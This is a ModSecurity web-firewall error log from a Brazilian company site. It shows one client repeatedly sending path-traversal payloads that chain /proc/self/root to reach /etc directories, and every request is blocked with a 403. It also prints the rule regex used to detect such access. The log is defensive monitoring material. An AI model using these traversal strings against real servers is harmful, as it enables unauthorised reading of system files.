[Mon Mar 16 09:23:42.969383 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:45212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2TtSswJuvopo3lOhMKwAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:24:10.400337 2026] [:error] [pid 21946:tid 140411674785536] [client 74.7.243.203:57366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2anbQATo66fKoS7w4EwAAAMg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:24:11.759056 2026] [:error] [pid 10709:tid 140411725141760] [client 74.7.243.203:32832] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2axXjF1vJNtV6CWrk6AAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:24:42.105040 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:32834] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2io6lpbStxTqkSkta_gAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:24:59.136200 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:40236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2m7ABkC4fWIHEf8HW2AAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:25:10.483757 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:40664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2prABkC4fWIHEf8HW4gAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:25:19.935142 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:38822] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2r5qj1wV0Si-OkefVTgAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:25:30.757019 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.243.203:54450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2urABkC4fWIHEf8HW7wAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:25:32.410520 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.228.16:52294] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abf2vP9ocpUE4ed4uDzY_wAAAg8"]
[Mon Mar 16 09:25:51.275153 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:39468] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf2z_9ocpUE4ed4uDzZIAAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:25:58.831852 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:47886] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf21rABkC4fWIHEf8HW-gAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:26:00.137582 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:47890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf22HjZBu2q05ozVU9CJwAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:26:52.876806 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:41516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3DNSswJuvopo3lOhMiQAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:26:54.197981 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:59922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3Dv9ocpUE4ed4uDzZKgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:13.119247 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.243.203:59938] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3IXbQATo66fKoS7w4eQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:14.400396 2026] [:error] [pid 11972:tid 140411683178240] [client 74.7.243.203:56574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3Ipqj1wV0Si-OkefVfQAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:15.675301 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:56590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3I7ysWC90G-1nBrAxfQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:16.982990 2026] [:error] [pid 10831:tid 140411557287680] [client 74.7.243.203:56604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3JI6lpbStxTqkSktbVQAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:18.980632 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:56612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3JrysWC90G-1nBrAxfwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:22.444043 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:37386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3KrABkC4fWIHEf8HXDwAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:26.191346 2026] [:error] [pid 32654:tid 140411725141760] [client 74.7.243.203:37388] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3LglT9VtDQc7bgUyX2AAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:27:27.500387 2026] [:error] [pid 21946:tid 140411733534464] [client 74.7.243.203:37390] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abf3L3bQATo66fKoS7w4hwAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
